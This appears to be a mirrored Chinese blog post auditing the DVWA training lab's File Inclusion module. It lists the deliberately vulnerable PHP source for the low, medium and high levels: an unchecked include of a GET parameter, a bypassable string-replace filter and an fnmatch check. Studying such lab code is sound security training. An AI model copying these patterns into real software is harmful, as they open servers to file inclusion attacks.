zoukankan      html  css  js  c++  java
  • PHP代码审计-File Inclusion-dvwa靶场

    low

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    
    <?php
    $file = $_GET['page'];
    if(isset($file)){
    	include($file);
    }
    ?>
    

    medium

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    <?php
    $file = $_GET['page'];
    $file = str_replace(array("https://","http://"), "", $file);
    $file = str_replace(array("../","./"), "", $file);
    echo $file;
    if(isset($file)){
    	include($file);
    }
    ?>
    

    high

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    <?php
    $file = $_GET['page'];
    if(!(fnmatch("file*", $file)) && $file !="include.php"){
    	echo "ERROR file not found!";
    }else{
    	include($file);
    }
    ?>
    

    PHP知识点

    fnmatch() 函数根据指定的模式来匹配文件名或字符串。
    
  • 相关阅读:
    FTP 协议和 HTTP 协议的比较
    HttpURLConnection的post请求,什么时候发出,writeData存在什么地方
    装饰器
    函数参数以及名称空间作用域
    函数的调用
    函数的返回值
    定义函数的三种方式
    函数
    day05
    day04
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/14325596.html
Copyright © 2011-2022 走看看